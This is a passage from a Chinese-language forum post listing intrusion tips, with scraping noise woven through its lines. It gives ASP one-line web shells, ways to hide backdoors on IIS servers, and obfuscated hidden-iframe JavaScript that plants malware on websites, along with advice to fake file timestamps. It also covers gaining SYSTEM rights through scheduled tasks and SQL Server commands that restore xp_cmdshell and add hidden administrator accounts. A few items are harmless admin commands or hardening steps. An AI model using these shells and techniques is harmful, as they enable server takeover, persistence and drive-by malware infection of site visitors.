' P5 T7 q4 T- H' q5 b( sd).<script language=VBScript runat=server>execute request("sb")</Script>
$ s7 ~4 \& Z% u" o, F: p+ Z8 G: A9 ~e).<%25Execute(request("l"))%25>7 E0 R. T: b/ L9 f. a
f).<%if request("cmd")<>"" then execute request("pass")%>9 `3 Z2 r6 I) M; ?: d8 q0 q

: s5 `! U/ |3 [' T( u' f52、at "12:17" /interactive cmd
0 E; R' [5 R. t7 U- ^4 W' ?执行后可以用AT命令查看新加的任务" T* u$ Y! c3 L% d( `( p0 Q3 z( s5 [
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。3 A3 ^3 i. u  k! ~% M5 V/ f
+ C8 I% `( l1 d
53、隐藏ASP后门的两种方法$ m) _3 B' p& L9 S6 ^* e) o6 X
1、建立非标准目录:mkdir images..\7 j' n% p/ f! L: H0 C
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* p( E# H5 ?9 x. \. E7 Z
通过web访问ASP木马:http://ip/images../news.asp?action=login
) m- U4 z. Z+ U3 }1 f1 T如何删除非标准目录:rmdir images..\ /s
6 k- e  I/ m7 F9 |) I" n+ f) j2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
( V. [$ o8 D! I. mmkdir programme.asp
: c: H2 a: {. Y6 g新建1.txt文件内容:<!--#include file=”12.jpg”-->1 r! w( v. R( y; m- _- G
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
/ v9 R+ {5 r% B& F% x) o/ [; U  n4 nattrib +H +S programme.asp
& ~' _- I8 f" k5 w( Q$ \* T通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt+ V5 X* ~6 u7 o  m- `+ J3 W

- e3 Z5 Q7 ^8 o$ s" Q" G54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" k$ F4 y3 m, q9 ]' X; V
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
; e# F( e0 a+ B$ ]0 ~% x
: z9 {9 j4 ?6 A( b55、JS隐蔽挂马4 u$ ^/ u& a8 p" O
1.
8 {4 y9 }0 g5 {- Avar tr4c3="<iframe src=ht";
7 [1 T' `, t# J& t& j7 btr4c3 = tr4c3+"tp:/";! C( F9 U9 O& g0 b/ G
tr4c3 = tr4c3+"/ww";( v- P( x7 w/ F
tr4c3 = tr4c3+"w.tr4";
& |# [0 M) ]' I8 o0 e$ |tr4c3 = tr4c3+"c3.com/inc/m";
- U2 J0 x4 y5 o, A$ v8 ^& qtr4c3 = tr4c3+"m.htm style="display:none"></i";
1 K/ v0 X$ w: V; ?' c  x) utr4c3 =tr4c3+"frame>'";
6 n( ]7 e, y5 E# ?- c4 zdocument.write(tr4c3);* t; l+ N) L- r$ o$ t% v- V
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。- A6 S6 \( `: N8 R/ x5 P

; c2 L9 ~- A# R2 H, H) K9 L# j2., \- B' X( f: ?& `2 x" i3 |. _* @
转换进制,然后用EVAL执行。如
9 h% P& K  M) ^eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
1 m: K( v( B; Z% }不过这个有点显眼。8 ~7 I2 k, y" m' q0 C" x- }
3.0 _: o7 h2 b8 ~0 }
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');6 J# E& V- _2 y
最后一点,别忘了把文件的时间也修改下。% f( n& g" [' `# q0 W: Y
8 x& O3 O: q/ \! s- K
56.3389终端入侵常用DOS命令5 e! c0 r8 p2 X& \9 j% \4 F
taskkill taskkill /PID 1248 /t
( e  ?' C  \1 }) K  x6 J
1 R! b6 v6 K! i; D( rtasklist 查进程5 w4 H; W, T, _8 e( E3 M/ I: E/ K6 y$ d. n

3 _" {6 t6 M* t2 c# O0 wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限: X5 c  S6 k. E
iisreset /reboot
! r. Z) R" Q9 k1 I/ s# @' etsshutdn /reboot /delay:1    重起服务器
, M1 l; ?# Q, ^7 {6 v3 y; m# R; A( I, J, w& H6 \/ m
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,1 ^6 t1 g1 M; R4 ]3 j6 ^7 P! a- V" P

: W" C$ J. y8 |2 B- K3 \query user 查看当前终端用户在线情况
" `- w% p& h# a( K7 k) K/ y$ ?
要显示有关所有会话使用的进程的信息,请键入:query process *
% X: i/ D' K& s2 _! [: ]& K' r9 C8 {$ d; \; ~4 D1 E
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2, _. _8 D8 R: _  K  m6 L& |

# }3 t! ]% I* H3 c6 P% X9 V要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2: n0 X- g+ ?8 I( {

2 ?' f# u) u' C4 Y3 ~* i要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM025 o8 ~3 O; e8 j& J' @+ F$ @3 N% U

& c0 i% r6 O& Z# n9 h命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
4 w+ K* {: b, T, N
& c+ O* p6 I- p( e命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
3 l1 }! k1 V( m7 y) N7 p' F  O
1 }) i& U1 I& [$ H* m- m6 l命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
& L1 L4 n: h. Q' q4 t. R+ C* h4 i# X
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机% O& Q! O* C$ G4 ]- p5 u' `( V6 I
7 X! M' _& |+ n& `- O$ ~
56、在地址栏或按Ctrl+O,输入:
( a9 e# d* n# {: k0 hjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
6 n" j* N0 J# R5 x0 v0 K0 `+ d% M: K; h* U$ ^
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。* l6 I; c3 p; t3 j  r; y# I
  I/ l4 s8 V  i. I8 p: ]
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
6 G! [" Q/ Y; U! L% ]; o+ b# k用net localgroup administrators是可以看到管理组下,加了$的用户的。7 C) Q! l) @1 k2 y4 q3 i5 U

) |; M6 X% v0 ]  W% e58、 sa弱口令相关命令& Q2 l3 q: L$ J+ K% w. H0 o% m
" _; J' `  o0 k+ ~$ n1 o: _
一.更改sa口令方法:
% _0 [, P9 A+ @用sql综合利用工具连接后,执行命令:
& q$ L( }6 w4 d. E/ L/ S! O8 j4 zexec sp_password NULL,'20001001','sa'5 ^# ]$ X# W4 @6 u# Z% `( ]
(提示:慎用!)1 K' _5 j' c/ O
7 ?8 O# d# n1 ?' y7 E
二.简单修补sa弱口令.* |) S6 W! K1 e4 Z) b
$ {0 e! Z) g1 k& K6 F5 R, y' G3 s
方法1:查询分离器连接后执行:
) S% R( ]  M7 E. @3 T( b7 b5 D/ Jif exists (select * from
4 i  y  ?2 ]: k) s7 rdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
3 R4 @- J5 [3 e# `: ^OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
0 _1 E7 _' T0 a9 `& v/ K! Y
/ Y! g  r1 [/ I' [( m& Y: _* kexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
7 i" B7 p, h$ m( t" H9 o, ^. a5 t2 d( P. Z) Z5 ]+ J& _& w
GO
7 c: v  C" n5 F8 g! a! O/ _" ]7 c+ `& S9 e1 N$ K. j) b
然后按F5键命令执行完毕3 d9 |6 V  i: I  \

- A+ j: t; m6 r. V% ?( R方法2:查询分离器连接后$ O6 u) C" H* T" }8 \
第一步执行:use master
8 Y; X# A1 t8 ~! x) s第二步执行:sp_dropextendedproc 'xp_cmdshell'
! B5 E) _* u- \+ Z& Z! }然后按F5键命令执行完毕
' D9 S# u. J& S; v  Y& L+ F# V, G) u+ D4 K. T
; `$ q# e' H6 E" V
三.常见情况恢复执行xp_cmdshell." ^, Q8 S3 y( p6 G) d1 l% R
# {/ q: U7 ^7 o- L

- ~1 _% W) s" q* G0 G' J9 B1 未能找到存储过程'master..xpcmdshell'.
, R9 l: V, L. z8 e   恢复方法:查询分离器连接后,
9 @% f5 o* {6 W& @* g第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int0 ]$ k# G! Y5 `# t4 r  Y; M
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% t+ c9 j1 Y! x; a然后按F5键命令执行完毕6 p+ K8 Q, u9 m+ a$ V. r

5 ?! ?9 Q1 J7 g# C+ N2 D2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)- v$ Q  K4 y, L7 y
恢复方法:查询分离器连接后,
5 _1 u  x- ~% z+ E第一步执行:sp_dropextendedproc "xp_cmdshell"
  m% ?6 E) R$ Q4 K第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. {& R: g0 e% W& v5 Z7 C
然后按F5键命令执行完毕  P2 l+ I- a& i2 G, g9 x( a4 p

3 e1 s+ |6 w! K+ `+ O3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( v2 L% ]! r* n0 u3 t" Q
恢复方法:查询分离器连接后,: G) x+ p, d) {
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
# g4 N, Y1 {% r第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           9 Y; }6 X, T( M8 M
然后按F5键命令执行完毕+ k" r' t0 L' }" I
; ~$ `9 t9 `* x. z. l& G1 ]
四.终极方法.
+ g' d) }3 e8 }如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:$ U' }0 E3 y$ q* d7 S; d. L0 z
查询分离器连接后,4 ]1 r5 R" x  e1 B: r' A% c
2000servser系统:
9 w* n, r" V+ [- r" H) c5 Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'4 y! U$ d8 I  p) I: g

6 f+ D! t1 D8 C  B; `& I6 V$ B$ ]" ]! ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ U, T0 r* B4 D3 k1 h9 g
/ s  `3 G& D$ b' ]! Nxp或2003server系统:+ d. O! H/ \4 h% D: M

: Y5 S- S  f  i, \/ edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
3 s: o2 F/ p7 Y8 W& s* |0 \0 J1 R( J( u9 p& Q1 i8 J6 f
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ w. ?8 s" |- m* ?1 [3 B. q6 _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表